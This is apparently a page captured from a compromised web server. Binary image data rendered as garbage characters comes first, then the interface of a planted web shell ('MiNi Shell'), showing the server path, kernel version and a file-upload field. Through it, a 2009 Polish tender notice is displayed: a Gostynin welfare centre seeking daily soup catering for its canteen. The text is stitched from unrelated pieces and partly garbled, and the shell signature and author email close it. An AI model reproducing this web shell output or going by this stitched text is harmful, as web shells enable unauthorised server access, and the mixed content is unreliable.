JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090204/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090204/17268-N-2009.html

<p class="kh_header"><b>Gostynin: usługa codziennego  przygotowywania i dostarczania zup z wkładką do Jadłodajni Miejskiej dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Gostyninie - catering</b><br>
<b>Numer ogłoszenia: 17268 - 2009; data zamieszczenia: 04.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Gostyninie , ul. Parkowa 22, 09-500 Gostynin, woj. mazowieckie, tel. 024 2356932, faks 024 2356932.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopsgostynin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa codziennego  przygotowywania i dostarczania zup z wkładką do Jadłodajni Miejskiej dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Gostyninie - catering.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: usługa codziennego  przygotowywania i dostarczania zup z wkładką do Jadłodajni Miejskiej dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Gostyninie - catering.

ZUPY
Przygotowanie i dostarczenie około 52800 porcji zup w postaci gorących posiłków w okresie od 1 marca do 31 grudnia 2009 r.
Przygotowanie i dostarczenie odbywać się będzie sukcesywnie po około 200 porcji zup dziennie w dni robocze oraz soboty.
Dostarczanie zup do Jadłodajni Miejskiej w Gostyninie przy ul. Zamkowej 17a, codziennie w godzinach od 12:00 do 13:00.
Odbieranie z Jadłodajni pojemników (termosów) codziennie o godz.16.00 po zakończeniu wydawania zup z wkładką.
Dostarczana jedna porcja zupy musi mieć kaloryczność w przybliżeniu 350 kcal.
Dostarczana jedna porcja zupy musi mieć pojemność 0,5 l.
Dostawa zup musi być różnego rodzaju
Zupy, dostarczane muszą być w temp. 85 0C.
Dostarcza się, co najmniej 10 rodzajów zupy:1)żurek, 2)pomidorowa z makaronem, 3)krupnik, 4)grochówka, 5)barszcz czerwony-ukraiński, 6)kapuśniak,7) jarzynowa, 8)kalafiorowa, 9)ogórkowa, 10) pieczarkowa
Zamawiający dokona faktycznej zapłaty za faktyczne wydane zupy w Jadłodajni w okresie rozliczeniowym.
Wykonawca nie może żądać dodatkowej zapłaty za ewentualne przygotowane i niewykorzystane zupy.
W zależności od potrzeb w poszczególnych miesiącach, ilości dostarczanych porcji zup mogą ulegać zmianie w zakresie ok. 15 % mniej porcji zup oraz ok.15% więcej porcji zup.
Wykonawca będzie raz w tygodniu uzgadniał szczegóły ilości tygodniowych dostaw zupy z zamawiającym.
Oferent określi cenę jednostkową 1 porcji zupy wraz z podatkiem VAT i cena ta będzie stała niezależnie od rodzaju zupy.

WKŁADKA DO ZUPY
Przygotowanie i dostarczenie około 52850 wkładek do zup  w okresie od 1 marca  do 31 grudnia 2009 r.
Przygotowanie i dostarczenie odbywać się będzie sukcesywnie po około 200 porcji wkładek do zup dziennie w dni robocze oraz w soboty
Dostarczanie wkładki do zup do Jadłodajni Miejskiej w Gostyninie przy ul. Zamkowej 17a, codziennie w godzinach od 12:00 do 13:00.
Dostarczana jedna porcja wkładki do zupy musi mieć wagę 100 g, bigos 200 g
Dostawa wkładki do zup musi być różnego rodzaju
Dostarcza się, co najmniej 5 rodzajów wkładki do zupy:1)kiełbasa, 2)kotlet mielony, 3)parówka, 4)pieczeń rzymska, 5)bigos.
Zamawiający dokona zapłaty za faktycznie wydane wkładki w Jadłodajni w okresie rozliczeniowym.
Wykonawca nie może żądać dodatkowej zapłaty za ewentualne przygotowane i niewykorzystane wkładki do zupy.
W zależności od potrzeb w poszczególnych miesiącach, ilości dostarczanych porcji wkładek mogą ulegać zmianie w zakresie ok. 15 % mniej porcji wkładek do zup oraz ok. 15% więcej porcji wkładek do zup.
Wykonawca będzie raz w tygodniu uzgadniał szczegóły ilości tygodniowych dostaw wkładek do zup z zamawiającym.
Oferent określi cenę jednostkową 1  wkładki do zupy wraz z podatkiem VAT i cena ta będzie stała niezależnie od rodzaju wkładki.
W soboty są dostarczane wkładki do zupy w ilości odpowiadającej dni wolnym (niedziele oraz święta wolne od pracy).

POZOSTAŁE
Posiłki należy dostarczać wg ustalonego harmonogramu, w osobnych naczyniach (termosach). Termosy wraz z wkładami zabezpiecza Wykonawca.
Do obowiązków Zamawiającego należy dostarczenie indywidualnych naczyń na posiłki, oraz sztućcy
Zapotrzebowania na posiłki dla podopiecznych składane będą w telefonicznie do godziny 11:00 i również potwierdzane pisemnie (FAX)
Wykonawca zobowiązany będzie do sporządzania dekadowych jadłospisów w oparciu o aktualne przepisy prawne obowiązujące przy ustalaniu racji pokarmowych w całodziennym wyżywieniu określonych grup ludności. 
Jadłospis winien być przedstawiony do akceptacji Zamawiającego z 4 dniowym wyprzedzeniem. Należy uwzględnić przygotowywanie posiłków tradycyjnych w okresach świątecznych.
Zakupy surowców Wykonawca realizował będzie w punktach, które zapewniają ich wysoką jakość, zupy powinny być przygotowywane na bazie produktów naturalnych bez użycia półproduktów (np. zupy w proszku).
W przypadku zastosowania innych technologii produkcji posiłków niż wymagane lub zalecane stosownymi przepisami Wykonawca musi uzyskać zgodę Powiatowej Stacji Sanitarno-Epidemiologicznej na ich stosowanie. Zamawiający zastrzega sobie prawo bieżącej kontroli w zakresie przestrzegania przez Wykonawcę przepisów dotyczących technologii produkcji i  jakości wykonywanych usług.
Obowiązkiem Wykonawcy będzie dostarczanie posiłków do pomieszczenia dystrybucji w Jadłodajni Miejskiej przy ul. Zamkowej 17a
Obowiązkiem Zamawiającego będzie mycie termosów, wraz z wkładami po wydaniu posiłków.
Maksymalna odległość na jaką Zamawiający dopuszcza dowożenie posiłków od Wykonawcy  do siedziby Zamawiającego nie może przekroczyć 40 km.
Do oferty należy dołączyć przykładowy jadłospis dekadowy dla diety podstawowej tzw. normalnej  wraz z gramaturą. 

3.	Zamawiający nie dopuszcza możliwości składania ofert wariantowych. 
4.	Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej. 
5.	Zamawiający dopuszcza możliwość składania ofert firmom, których siedziba znajduje się poza granicami Rzeczypospolitej Polskiej.
6.	Wymagania stawiane Wykonawcy:
6.1	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
6.2	Wymagana jest należyta staranność przy realizacji zobowiązań umowy, 
6.3	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy. 
6.4	Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.  
6.5	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1	Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2	Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.3	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4	Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.

2.	Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
2.1	nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1.1 do 1.4.
2.2	podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
2.3	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
2.4	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
2.5	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
2.6	nie zgodzili się na przedłużenie okresu związania ofertą 

3.	Zamawiający odrzuca ofertę jeżeli:
3.1	jest niezgodną z ustawą
3.2	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych.
3.3	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
3.4	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
3.5	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
3.6	zawiera błędy w obliczeniu ceny 
3.7	wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
3.8	jest nieważna na podstawie odrębnych przepisów, 

4.	Ofertę wykonawcy wykluczonego uznaje się za odrzuconą
5.	Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Na ofertę składają się następujące dokumenty i załączniki:
1.1	Formularz ofertowy - wypełniony i podpisany przez wykonawcę

2.	W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
2.1	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
2.2	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych (zgodnie z treścią formularza stanowiącego załącznik nr 2 do SIWZ) .   

3.	W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 
3.1	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot  niniejszego zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie.  
3.2	Zamawiający wymaga żeby Wykonawca wykonał co najmniej 1 usługę polegającą na przygotowaniu zup z wkładką w liczbie minimum 5000 posiłków miesięcznie (zgodnie z treścią formularza stanowiącego załącznik nr 4 do SIWZ).
3.3	Decyzja właściwego Inspektora Sanitarnego o spełnianiu wymogów higieny oraz właściwej jakości zdrowotnej przygotowywanych posiłków.

4.	Postanowienia dotyczące składanych dokumentów
4.1	Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.
4.2	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mopsgostynin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Gostyninie
Parkowa 22
09-500 Gostynin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2009 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Gostyninie
Parkowa 22
09-500 Gostynin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com